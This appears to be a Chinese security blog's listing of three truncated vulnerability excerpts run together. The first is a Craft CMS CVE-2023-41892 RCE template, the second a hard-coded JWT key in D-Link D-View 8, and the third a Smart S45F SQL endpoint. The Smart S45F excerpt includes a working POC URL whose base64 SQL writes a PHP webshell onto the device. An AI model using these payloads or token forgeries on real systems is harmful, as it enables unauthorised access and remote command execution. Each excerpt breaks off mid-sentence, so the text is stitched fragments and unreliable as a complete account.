漏洞描述Craft CMS是一个创造数字体验的平台。这是一个高影响、低复杂度的攻击向量。鼓励在4.4.15之前运行Craft安装的用户至少更新到该版本,以缓解问题。该问题已在Craft CMS 4.4.15中修复。影响版本Craft CMS >= 4.0.0-RC1Craft CMS <= 4.4.14POCid: CVE-2023-41892 info: name: CraftCMS < 4.4.15 - Unauthenticated Remote Code Execution author: iamnoooob,rootxharsh,pdresearch severity: critical description: Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Cr
原理由于JWT令牌的安全校验使用的是硬编码,导致攻击者可伪造合法的JWT令牌进行访问。危害由于默认情况下,初始管理员的 userId 是相同的,未授权攻击者可以利用 JWT 密钥配合该 userId 伪造令牌,从而访问受保护的API路由。分析Tenable的一名研究人员在D-Link D-View 8 v2.0.1.28中发现了一个身份验证绕过漏洞。D-View 8使用硬编码的密钥(D-Link)来保护用户身份验证中使用的JWT令牌:// webApi-0.0.1-SNAPSHOT.jar!com.dlink.dview8.webapi.utils.TokenUtils public static String verifyToken(String token) { if (Utils.isEmpty(token)) return null; Algorithm algorithm = Algorithm.HMAC256("D-Link"); JWTVerifier verifier = JWT.require(algor
原理SQL语句执行接口未授权访问,可执行任意SQL语句。影响范围Smart S45F危害远程攻击者可利用该漏洞执行任意SQL语句,包括写入webshell。POC & EXP手工漏洞位置:https://ip:port/importexport.php该接口可以使用GET参数执行SQL语句参数sql=base64编码的SQL语句 参数type=exportexcelbysql,执行动作 POC:1https://ip:port/importexport.php?sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNjU2MzY4NmYyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUwNGY1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiM2YzZSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvc2VjLnBocCc=&type=exportexcelbysql base64: select 0x3c3f706870206563686f2073797374656d28245f504f53545b2263
Equinox
一个乐于分享的网安人